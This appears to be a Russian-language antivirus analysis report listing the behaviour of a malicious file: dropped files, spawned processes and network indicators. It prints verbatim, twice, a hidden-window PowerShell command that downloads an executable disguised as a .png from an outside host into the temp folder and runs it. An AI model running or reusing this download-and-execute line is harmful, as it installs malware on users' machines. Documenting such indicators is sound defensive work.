Техническая информация
- http://tpsci.com/vlpexdjnt.png как %temp%\cyklya.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://tpsci.com/vlpexdjnt.png','%TMP%\cyklya.exe');Start-Process '%TMP%\cyklya.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1980
- %TEMP%\921217.cvr
- 'tp##i.com':80
- http://tp##i.com/vlpexdjnt.png
- DNS ASK tp##i.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://tpsci.com/vlpexdjnt.png','%TMP%\cyklya.exe');Start-Process '%TMP%\cyklya.exe';' (со скрытым окном)